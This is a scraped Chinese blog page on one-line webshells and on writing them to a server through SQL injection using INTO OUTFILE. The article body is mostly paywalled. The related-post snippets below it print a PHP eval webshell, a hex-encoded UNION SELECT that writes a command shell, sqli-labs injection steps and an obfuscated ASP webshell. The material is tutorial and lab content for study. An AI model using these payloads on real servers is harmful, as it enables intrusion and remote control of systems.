一句话木马写入以及通过sql进行服务器的远程控制

最新推荐文章于 2024-01-26 10:18:56 发布
VIP文章 最新推荐文章于 2024-01-26 10:18:56 发布
阅读量1.8k 收藏 2
点赞数 1
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44720762/article/details/89437499
版权

在开始之前我想先在这里提醒选择阅读这篇博客的读者。因为本人初涉安全领域知识。关于sql盲注尚处于学习和摸索状态,存在对些许知识点和概念理解尚不清晰甚至是完全偏差的问题。此博客亦是只起到对现所学知识的一个记录。所以只起到一个借鉴的作用,并不建议读者用作专业知识学习。

在演示通过sql进行服务器的远程控制之前,必须首先清除两个基本的概念,也就是一句话木马以及如何通过into_outfile写入代码并控制DMS。

首先要说的是一句话木马。一句话木马,顾名思义就是短小的,简练的代码,避免复杂,冗长。且一句话木马隐蔽性好,功能强大。在这里插入图片描述
这里引用以为专业人员对于一句话木马的概述。实际上一句话木马就是利用各种语言中用来执行代码的函数(即用来执行操作系统命令的函数),通过它来构造简单的木马程序。将相应的函数写入到一个文件中(远程目录),通过对文件的访问来实现函数,通过向该函数传递想要进行的操作来间接实现对DMS的操作。
值得提及的是,不同的语言的一句话木马也不同,由于数量过多,在此不方便一一列举。如果有想要了解的读者可以自行到网上进行相关的查找。

有了一句话木马,当然要将其写入到DMS相应的目录中,才能进行后续的操作,那该如何将其写入到DMS中呢。在这里用到了into_outfile函数的方法

最低0.47元/天 解锁文章
三块五的咸菜干
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
一句话 asp木马加密版 彻底突破杀毒软件
01-02
不知道怎样表达清楚。看例子吧: 代码如下:[removed] Execute(HextoStr(“65786563757465287265717565737428636872283335292929”)) Function HextoStr(data) HextoStr=”EXECUTE “”””” C=”&CHR(&H” N...
实验6 一句话木马
Sum
06-02 1003
实验6 一句话木马 一、文件上传漏洞 预备知识 文件上传漏洞是指网络攻击者上传了一个可执行的文件到服务器并执行。这里上传的文件可以是木马,病毒,恶意脚本或者WebShell等。这种攻击方式是最为直接和有效的,部分文件上传漏洞的利用技术门槛非常的低,对于攻击者来说很容易实施。 大部分的网站和应用系统都有上传功能,如用户头像上传,图片上传,文档上传等。一些文件上传功能实现代码没有严格限制用户上传的文件后缀以及文件类型,导致允许攻击者向某个可通过Web访问的目录上传任意PHP/JSP/ASPX/ASP文件,并能够
命令执行漏洞——远程命令执行
weixin_54055099的博客
09-17 3650
命令执行漏洞之远程命令执行的基础操作
sql注入之into outfile语句写入一句话木马
最新发布
m0_63436163的博客
01-26 1175
into outfile 语句用于把表数据导出到一个文本文件中,要想mysql用户对文件进行导入导出,首先要看指定的权限目录。当secure_file_priv的值为/tmp/ ,表示限制mysqld 的导入|导出只能发生在/tmp/目录下;5)select
远程控制——一句话木马
Coffilater的博客
11-13 6431
两个物理机要连在同一个子网,都采用桥接方式 普通用户有很多权限限制,所以要用root权限 默认打开目录是在var/www/html 所以直接在该目录下创建shell.php文件 http默认端口为80,如果是别的端口,要在后面加上端口确定的号码 nmap扫描端口是否开放 apach 开放 service apache2 start 开放端口 在Kali Linxu中使用默认端口打开Apache服务 开放之后再扫描,可以看到端口已经开放 http://192.168.43.7
sql-inject 通过一句话木马服务器进行远程控制
北冥有鱼
04-03 667
1.一句话木马 说简单点,它就是利用各种语言提供的用来执行操作系统命令的函数去构造一个简单的木马程序,我们可以把这个函数直接写到一个文件里去,通过对这个文件的访问,去执行这个函数,向这个函数去传入我们想要进行的操作,这个函数会被执行,然后执行我们想要的操作 2.通过SQL Inject漏洞写入恶意代码 我们可以利用into oufile来传入我们的木马,但并不是很容易就可以传进去的,它是有前提条...
SQL注入上传一句话木马
buffedon的博客
05-31 8457
利用sql注入上传一句话木马导读1. sql注入的危害2. 文件写入2.1 webshell和一句话木马webshell(大马)一句话木马木马文件的危害2.2 文件写入的前提条件2.3 写入函数2.4 怎么找网站根目录(绝对路径)2.5 只能与回显注入结合2.6 日志写文件2.7 文件读取前提条件读取函数2.8 针对文件写入的防护 导读 本文主要介绍了利用sql漏洞上传文件的一些知识。在利用sql注入漏洞上传文件的时候我们需要知道 被上传的网页 在web服务器的路径 上传文件要获取哪些权限,也就是有哪些前
php一句话cmdshell新型 (非一句话木马)
10-30
php运行时如果遇见字符``(键盘上~符号的下档键)总会尝试着执行``里面包含的命令,并返回命令执行的结果(string类型);
探索基于.NET下实现一句话木马之asmx篇1
08-03
云影实验室探索基于.NET 下实现一句话木马之 asmx 篇Ivan@360 云影实验室2018 年 07 月 18 日云影实验室0x01 前言上篇介绍了一般处
RemoteSQL 远程访问控制数据库软件 v1.03a
11-01
是Windows平台上基于标准SQL命令的一款远程数据库访问控制软件,无论被控制数据库的机器是否处于局域网内或是通过代理上网,只要控制与被控制一方具有相对固定的外部IP(动态或静态获得),就都可以使用此软件进行远程数据库控制。它支持多种数据库系统,包括Paradox 、Access 、Foxpro 、Dbase及MS SQL Server 、Oracle 、DB2 、Infomix等,可选择数据库及其中的表,查看表中各字段的详细信息,运行标准SQL语句修改数据表、字段、数据内容等,同时显示操作的结果,无论宽带窄带上网,显示结果速度都很快,效果就象在本地运行查询分析器一般。双方同时还可以进行文字交流,就象聊天一样,而无需登录其它服务器。控制方还可以随时查看被控方的屏幕画面
除了文件上传还有哪些方式可以写一句话木马
qq_51553814的博客
11-29 2244
除了文件上传还有哪些方式可以写一句话木马一句话木马如果上传到服务器的话,有啥危害学过网络安全的人都知道。但是通常网上流传的方式都是通过文件上传来实现木马上传,实在太过老套,这里就教大家几个新的方式来本地生成一句话木马。(这篇笔记知识带大家入个门,想了解的话还得自己查询资料来学习) 这篇笔记也是有很多跳转内容,看不懂可以尝试看看跳转的博客,他们写的一定是比我更好 结合sql注入生成一句话木马 讲这之前得先介绍mysql配置文件中的secure_file_priv选项 secure_file_priv配置
webshell 一句话木马
无痕的博客
01-12 2790
一句话木马
MySQL注入之木马上传拿webshell
热门推荐
Jim的博客
08-15 1万+
原理:利用MySQL中的写命令into outfile(固定式:select A into outfile B),在目标Web虚拟路径D:/WWW/下面生成一个木马文件  工具:中国菜刀 1.首先查找SQL注入点 使用单引号'报错,使用and 1=1页面正常和and 1=2页面不正常,来判断存在SQL注入 2.使用order by猜测字段数量 ?id=1+order+by+2--+
mysql写入一句话木马
Websec
07-16 1万+
前提: root权限,知道了服务器的web的绝对路径,尝试写入一句话 mysql查询语句执行:select "<?php @eval($_POST['pass']);?>" INTO OUTFILE "D:\Wamp\2.php" 注意事项: 1、绝对路径的猜解 2、INTO OUTFILE 后面的"D:\Wamp\2.php",有的时候需要变成“D:\\Wamp\\2.ph...
linux mysql写入一句话,mysql 写入一句话
weixin_39947908的博客
05-12 257
mysql 写入一句话方法一:1、SHOW VARIABLES LIKE "secure_file_priv"; 查看文件导出功能是否开启 如果:secure_file_priv NULL 值为 null 说明禁止状态,无法导出为文件,需要修改MySQL配置文件:查看是否有 secure_file_priv = ,没有的话添加上 如果为一个目录,如:s...
mysql创建木马_Mysql的语句生成后门木马的方法
weixin_39835607的博客
02-18 109
咳咳,大家看看就好了,本人不负责所产生的后果代码如下:SELECT * FROM `vbb_strikes` WHERE 1 union select 2,3,0x3C3F7068702073797374656D28245F524551554553545B636D645D293B3F3E from vbb_strikes into outfile 'c:/inetpub/wwwroot/cmd.p...
sqli-labs-less-7 使用outfile函数写入一句话木马
yzcn
10-30 1545
Less-7 一句话木马 判断注入点: 127.0.0.1/sqli-labs-master/Less-7/?id=1 显示正常 提示:You are in… Use outfile… 127.0.0.1/sqli-labs-master/Less-7/?id=1’ 显示错误,错误信息:You have an error in your SQL syntax 。。。。。。 127.0.0.1/sqli-labs-master/Less-7/?id=1’)) 显示错误 127.0.0.1/sqli-l
蚁剑jsp一句话木马
11-23
根据提供的引用内容,我们可以了解到蚁剑是一款常用的管理工具,而一句话木马则是黑客攻击中常用的一种方式。...需要注意的是,使用一句话木马进行攻击是非法的行为,本回答仅供学习和研究使用,请勿用于非法用途。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值